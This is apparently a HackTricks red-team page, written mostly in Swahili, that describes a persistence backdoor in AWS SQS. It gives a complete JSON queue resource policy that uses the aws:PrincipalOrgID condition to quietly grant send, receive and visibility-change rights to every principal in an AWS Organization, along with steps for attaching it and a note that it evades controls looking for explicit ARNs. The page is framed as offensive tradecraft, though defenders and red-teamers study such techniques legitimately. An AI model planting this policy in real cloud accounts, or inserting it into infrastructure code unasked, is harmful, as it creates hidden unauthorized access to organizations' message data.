AWS - SQS OrgID Policy Backdoor

Reading time: 2 minutes

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Tumia vibaya sera ya rasilimali ya SQS queue ili kimya kimya kumruhusu Send, Receive na ChangeMessageVisibility kwa principal yeyote anayehusishwa na target AWS Organization kwa kutumia condition aws:PrincipalOrgID. Hii inaunda njia iliyofichwa iliyo na upeo wa shirika (org-scoped) ambayo mara nyingi huikwepa udhibiti unaotafuta tu ARNs za akaunti au role zilizo wazi au star principals.

Backdoor policy (ambatisha kwenye sera ya SQS queue)

json
{
"Version": "2012-10-17",
"Statement": [
{
"Sid": "OrgScopedBackdoor",
"Effect": "Allow",
"Principal": "*",
"Action": [
"sqs:ReceiveMessage",
"sqs:SendMessage",
"sqs:ChangeMessageVisibility",
"sqs:GetQueueAttributes"
],
"Resource": "arn:aws:sqs:REGION:ACCOUNT_ID:QUEUE_NAME",
"Condition": {
"StringEquals": { "aws:PrincipalOrgID": "o-xxxxxxxxxx" }
}
}
]
}

Hatua

  • Pata Organization ID kwa kutumia AWS Organizations API.
  • Pata SQS queue ARN na weka queue policy ikijumuisha tamko hapo juu.
  • Kutoka kwa principal yeyote anayehusishwa na Organization hiyo, tuma na pokea ujumbe kwenye queue ili kuthibitisha ufikiaji.

Madhara

  • Ufikiaji uliojificha kwa ngazi ya Organization wa kusoma na kuandika ujumbe za SQS kutoka kwa akaunti yoyote katika AWS Organization iliyotajwa.

tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks